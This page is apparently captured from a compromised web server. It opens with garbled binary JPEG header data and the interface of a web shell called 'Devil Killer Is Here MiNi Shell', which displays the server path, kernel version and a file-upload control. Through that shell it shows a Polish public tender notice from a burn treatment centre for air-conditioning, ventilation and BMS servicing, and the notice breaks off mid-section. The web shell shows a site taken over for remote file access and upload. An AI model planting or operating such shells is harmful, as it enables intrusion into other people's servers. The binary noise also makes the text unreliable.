JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241010/0054130801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwis, konserwacje i naprawy instalacji klimatyzacji i wentylacji oraz jednorazowa modernizacja części układów instalacji i urządzeń klimatyzacyjnych i centrali wentylacyjnej dla potrzeb HBO. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Leczenia Oparzeń im. dr. Stanisława Sakiela w Siemianowicach Śląskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272165010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@clo.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.clo.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwis, konserwacje i naprawy instalacji klimatyzacji i wentylacji oraz jednorazowa modernizacja części układów instalacji i urządzeń klimatyzacyjnych i centrali wentylacyjnej dla potrzeb HBO. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee8d0984-117d-48c2-a50e-ad1de621cdf4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00541308</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00048591/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Serwis, konserwacje i naprawy instalacji klimatyzacji i wentylacji oraz jednorazowa modernizacja części układów instalacji i urządzeń klimatyzacyjnych i centrali wentylacyjnej dla potrzeb pracowni HBO</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ee8d0984-117d-48c2-a50e-ad1de621cdf4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej.<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>3. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert):<br/>a) Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Formularze do komunikacji umożliwiają również<br/>dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozp. Prezesa RM z dn. 30.12.2020 r. w spr. sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (dalej &#34;rozp. Prezesa RM w spr. wymagań dla dokumentów elektronicznych&#34;) opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy<br/>wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>b) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozp. Prezesa RM w spr. wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozp. RM z dn. 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (i przekazuje się jako załącznik), lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>c) Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej, email: przetargi@clo.com.pl<br/>d) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>e) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>f) Max. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików<br/>przesyłanych jako załączniki do jednego formularza).<br/>4. Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa wykonawca, w celu utrzymania w poufności<br/>tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku<br/>„Dokument stanowiący tajemnicę przedsiębiorstwa”. Zarówno załącznik stanowiący tajemnicę przedsiębiorstwa jak i uzasadnienie<br/>zastrzeżenia tajemnicy przedsiębiorstwa należy dodać w polu „Załączniki i inne dokumenty przedstawione w ofercie przez<br/>Wykonawcę”.<br/>5. Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CLO/ZP/37/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie na rzecz Centrum Leczenia Oparzeń im. dr. Stanisława Sakiela w Siemianowicach Śląskich usług: <br/><br/>I.	Stałego utrzymania w ruchu instalacji i urządzeń klimatyzacyjnych, wentylacyjnych, automatyki oraz systemów zarządzania budynkami BMS produkcji KIEBACK&amp;PETER:<br/>Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia:<br/>1.	Stałe utrzymanie w ruchu instalacji i urządzeń klimatyzacyjnych, wentylacyjnych, automatyki oraz systemów zarządzania budynkami BMS produkcji KIEBACK&amp;PETER, zgodnie z wykazem:<br/>1)	Centrale klimatyzacyjne WOLF – 29 sztuk.<br/>2)	Sterowniki KIEBACK &amp; PETER typu: <br/>‧	DDC-3200<br/>‧	MRP-6<br/>‧	SBM<br/>‧	DDC-4000<br/>‧	BMR410 <br/>3)	Oprogramowanie i monitoring BMS produkcji KIEBACK&amp;PETER – 2 komplety.<br/>4)	Agregat ziębniczy CLIVET WSAT-XSC220F – 1 sztuka.<br/>5)	Centrale VTS serii VENTUS: <br/>‧	VS-30-R-CH – 1 sztuka (układy automatyki oparte na regulatorze MNL – 200 Satchwell) agregat chłodniczy marki McQuay M4MC075D-F9AA-R.<br/>‧	VS-10-R-CH-D – 1 sztuka (układy automatyki oparte na regulatorze MNL – 200 Satchwell) agregat chłodniczy marki McQuay M5LC025C-ACPOC-R.<br/>6)	Centrale Clima Produkt serii HYGIENOS:<br/>‧	D-2-P-S – 1 sztuka z pompą ciepła (układ automatyki oparty na sterownikach DDC – 3000 i oprogramowaniu <br/>z monitoringiem BMS produkcji KIEBACK&amp;PETER).<br/>7)	Centrale klimatyzacyjne CWDH Ciecholewski:<br/>‧	3 sztuki (układ automatyki oparty na sterownikach DDC410 i oprogramowaniu z monitoringiem BMS produkcji KIEBACK&amp;PETER).<br/>‧	Agregat wody lodowej Aermec AWL – 1 sztuka.<br/>8)	Centrale wentylacyjne FRAPOL nawiewno – wywiewne: <br/>‧	Typu AF – 12 sztuk.<br/>9)	Centrale wentylacyjne FRAPOL nawiewne: <br/>‧	Typu AF – 6 sztuk.<br/>10)	Centrale wentylacyjne FRAPOL podwieszane: <br/>‧	Typu Mini 01 – 10 sztuk.<br/>11)	Nagrzewnica elektryczna kanałowa Termex typ: ENO – 7 sztuk.<br/>12)	Nawilżacze elektrodowe Pego seria ES – 8 sztuk.<br/>13)	Wentylatory kanałowe Harman – 24 sztuk.<br/>14)	Wentylatory osiowe – 7 sztuk.<br/>15)	Wentylatory dachowe – 1 sztuka.<br/>16)	Regulatory przepływu VAV firmy SMAY<br/>17)	Agregat skraplający Tecumseh – 1 sztuka.<br/>18)	Oprogramowanie i monitoring BMS produkcji KIEBACK&amp;PETER<br/>19)	Klimatyzatory typu Split: <br/>‧	Hayer – 1 sztuka.<br/>‧	Rotenso – 13 sztuk.<br/>‧	York – 1 sztuka.<br/>‧	McQuay - 3 sztuki.<br/>‧	Fujitsu -	35 sztuk.<br/>‧	Fuji - 8 sztuk.<br/>‧	Acson -	1 sztuka.<br/>‧	Airwell - 2 sztuki.<br/>‧	LG - 8 sztuk.<br/>‧	Vivax - 1 sztuka.<br/>‧	Sinclair - 7 sztuk.<br/>20)	Klimatyzatory typu MultiSplit: <br/>‧	Fujitsu (2 jednostki wewnętrzne) – 4 komplety.<br/>‧	Fujitsu (3 jednostki wewnętrzne) – 4 komplety.<br/>‧	Sinclair (3 jednostki wewnętrzne) – 2 komplety.<br/>‧	Sinclair (4 jednostki wewnętrzne) – 2 komplety.<br/>21)	Klimakonwektory:<br/>‧	SF-400H<br/>22)	System VRV firmy MDA:<br/>‧	MDA – 6 jednostek wewnętrznych<br/>23)	Agregat chłodniczy Rivacold Hucera 26A – 1 sztuka.<br/><br/>2.	Usługi będą realizowane 4 razy w tygodniu (4 dni serwisowe), obejmując swoim zakresem w ciągu tygodnia całość urządzeń i instalacji.<br/>3.	Usługi obejmują wykonywanie napraw, remontów i usuwanie bieżących awarii urządzeń klimatyzacyjnych, wentylacyjnych, automatyki oraz systemów zarządzania budynkami BMS produkcji KIEBACK&amp;PETER.<br/>4.	W ramach usługi Wykonawca dostarcza i wymienia filtry powietrza do układów klimatyzacji i wentylacji, zgodnie z instrukcją serwisową central wentylacyjnych. Rodzaj filtra, wymiary filtra (mm) oraz ilość potrzebna do jednokrotnej wymiany została określona w tabeli zawartej w Rozdziale 5 pkt 5.2. SWZ.<br/>5.	Wykonawca zobowiązuje się do wykonywania stałej konserwacji całości instalacji klimatyzacji <br/>i wentylacji z systemem monitoringu komputerowego zainstalowanego w CLO w zakresie: <br/>1)	bieżących i okresowych sprawdzeń poprawności działania oraz przeglądów poszczególnych podzespołów instalacji klimatyzacji i wentylacji wynikających z DTR urządzeń;<br/>2)	wykonywanie napraw oraz remontów urządzeń objętych przedmiotem zamówienia;<br/>3)	pomiarów kontrolnych nawiewnych i wywiewnych układów wentylacyjnych;<br/>4)	kontroli i wymian filtrów powietrza;<br/>5)	pomiarów ilości glikolu w układach chłodniczych;<br/>6)	regulacji w układach sterowania oraz kontroli nastaw i sprawdzenia skuteczności działania układów sygnalizacyjnych i zabezpieczających;<br/>7)	przyjazdu do siedziby Zamawiającego w ciągu 4 godzin na każdorazowe wezwanie telefoniczne w przypadku awarii.<br/>6.	W przypadku sygnalizacji systemu zabrudzenia filtrów Wykonawca zobowiązuje się do wymiany filtrów w dzień serwisowy w ciągu 24 godzin bez odrębnego wezwania Zamawiającego. W dniach nie-serwisowych o konieczności wymiany filtrów Wykonawcę informuje Zamawiający wyznaczając odpowiedni termin na wymianę. <br/>7.	W przypadku konieczności dostawy/wymiany elementów eksploatacyjnych, uszkodzonych części Wykonawca przed podjęciem pracy przedstawi Zamawiającemu do akceptacji protokół konieczności oraz proponowaną kalkulację kosztów naprawy zawierającą ilość i cenę części i podzespołów niezbędnych do wykonania naprawy. Zamawiający przedstawiony przez Wykonawcę kosztorys zweryfikuje w oparciu o każdorazowo dokonywaną analizę rynku.<br/>8.	W przypadku konieczności wykonania remontu lub dokonania naprawy urządzeń objętych przedmiotem zamówienia Wykonawca przed podjęciem pracy przedstawi Zamawiającemu do akceptacji protokół konieczności oraz proponowaną kalkulację kosztów wykonania remontu zawierającą ilość oraz cenę części i podzespołów niezbędnych do wykonania remontu. Zamawiający przedstawiony przez Wykonawcę kosztorys zweryfikuje w oparciu o każdorazowo dokonywaną analizę rynku.<br/>9.	Podstawą wykonania naprawy będzie Protokół konieczności podpisany przez uprawnionych przedstawicieli obu Stron.<br/>10.	Materiały (części i podzespoły) niezbędne do przeprowadzenia napraw dostarczy Wykonawca.<br/>11.	Maksymalna wartość zobowiązania Zamawiającego za materiały i części zamienne dla całego okresu realizacji umowy nie może przekroczyć kwoty 73 800,00 zł brutto (słownie: siedemdziesiąt trzy tysiące osiemset złotych zero groszy).<br/>12.	Po wykonaniu naprawy/remontu Wykonawca sporządzi Protokół odbioru wykonanej naprawy podpisany przez uprawnionych przedstawicieli obu Stron.<br/>13.	Koszty za materiały pomocnicze niezbędne do przeprowadzenia przeglądów ponosi Wykonawca.<br/>W skład materiałów pomocniczych w szczególności wchodzą:<br/>1)	żarówki i lampki sygnalizacyjne w układach sterowań;<br/>2)	bezpieczniki;<br/>3)	materiały i płyny czyszczące, konserwujące, zabezpieczające i dezynfekujące;<br/>4)	wkręty, śruby, nakrętki.<br/>14.	Prace serwisowe będą realizowane 4 razy w tygodniu od poniedziałku do piątku z wyłączeniem sytuacji awaryjnych, tzn. uszkodzenia maszyn, urządzeń i systemów odpowiadających za prawidłową dystrybucję powietrza w obiekcie.<br/>15.	Wykonawca zobowiązany jest zapewnić całodobowy dyżur serwisowy we wszystkie dni tygodnia, pracowników wyposażonych w środki transportu oraz podstawowe części zamienne, zdolnych do przyjazdu w przypadku awarii.<br/>16.	Wykonawca zobowiązany jest dysponować kluczem serwisowym do programowania sterowników i systemów BMS produkcji KIEBACK&amp;PETER.<br/>17.	Wykonawca zobowiązany jest do:<br/>1)	ponoszenia odpowiedzialności za wszelkie szkody spowodowane niewłaściwie przeprowadzonym przeglądem, konserwacją lub niewłaściwie przeprowadzoną naprawą;<br/>2)	usunięcia wyrządzonych szkód na własny koszt i ryzyko w terminie do 2 dni od dnia otrzymania powiadomienia od Zamawiającego;<br/>3)	utylizacji na własny koszt zużytych części zamiennych, materiałów eksploatacyjnych (w tym filtrów) oraz innych wymagających tego elementów, na zasadach określonych w obowiązujących przepisach prawa.<br/>II.	Jednorazowej modernizacji: <br/>1.	Części układów instalacji i urządzeń klimatyzacyjnych:<br/>Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia:<br/>W ramach usługi Wykonawca dokona jednorazowej modernizacji części układów instalacji (w terminie 60 dni od dnia zawarcia umowy). Jednorazowa modernizacja obejmuje: <br/>1)	zakup i zabudowanie (wymianę) czujników TLD2 na czujniki THL2 dla nawiewu i wywiewu w centralach klimatyzacyjnych N10W10; N20W20; N21W21; N37W37 - 8 sztuk,<br/>2)	zabudowanie w szafach sterowniczych dodatkowych modułów rozszerzeń FBU 410 produkcji KIEBACK&amp;PETER - 4 sztuki,<br/>3)	zakup i zamontowanie nagrzewnicy oraz wykonanie zmian umożliwiających uzyskanie funkcji osuszania powietrza w centrali N37W37 (Parametry nagrzewnicy: do centrali AF15 / P40, wydatek powietrza 3600 m3/h, moc nagrzewnicy 48,41 kW),<br/>4)	wykonanie zmian programowych i uruchomienie zainstalowanych czujników oraz nagrzewnicy,<br/>5)	wprowadzenie zmian w systemie BMS związanych z dodaniem czujników THL2 oraz nagrzewnicy.<br/>2.	Centrali wentylacyjnej dla potrzeb pracowni Hiperbarii Tlenowej:<br/>Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia:<br/>W ramach usługi Wykonawca dokona jednorazowej modernizacji centrali wentylacyjnej dla potrzeb pracowni Hiperbarii Tlenowej (w terminie 60 dni od dnia zawarcia umowy). Jednorazowa modernizacja obejmuje: <br/>1)	zakup i zamontowanie nowej centrali o parametrach technicznych nie gorszych niż likwidowana centrala wentylacyjna,<br/>2)	zakup i zamontowanie nowego agregatu skraplającego,<br/>3)	zakup i zamontowanie nowej automatyki obsługującej centralę wentylacyjną opartą na sterowniku Kieback&amp;Peter (DDC420),<br/>4)	podłączenie istniejącej instalacji grzewczej, <br/>5)	podłączenie istniejących kanałów wentylacyjnych,<br/>6)	uruchomienie centrali wentylacyjnej wraz z wykonaniem koniecznych testów,<br/>7)	podłączenie centrali wentylacyjnej do systemu BMS wraz z utworzeniem bitmapy ją obsługującej,<br/>8)	przekazanie dokumentacji powykonawczej.<br/>Parametry istniejącej centrali wentylacyjnej: <br/>‧	centrala wentylacyjna stojąca typ CV-A1-P/ML-42B/6-6, <br/>‧	filtr EU4, <br/>‧	chłodnica freonowa z odkraplaczem Q=22kW, <br/>‧	nagrzewnica wodna 80/65 Q=30kW, <br/>‧	wentylator osiowy V=2180 m3/h dP=400Pa, <br/>‧	dwa króćce elastyczne, przepustnica wielopłaszczyznowa, automatyka przystosowana do współpracy z wentylatorem dachowym, kasetka zdalnego sterowania z osuszaniem powietrza oraz regulatorem obrotów wentylatora nawiewnego i wywiewnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana wartość oferty brutto/ wartość brutto oferty badanej x 100 pkt.<br/>Wynik:<br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością<br/>uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 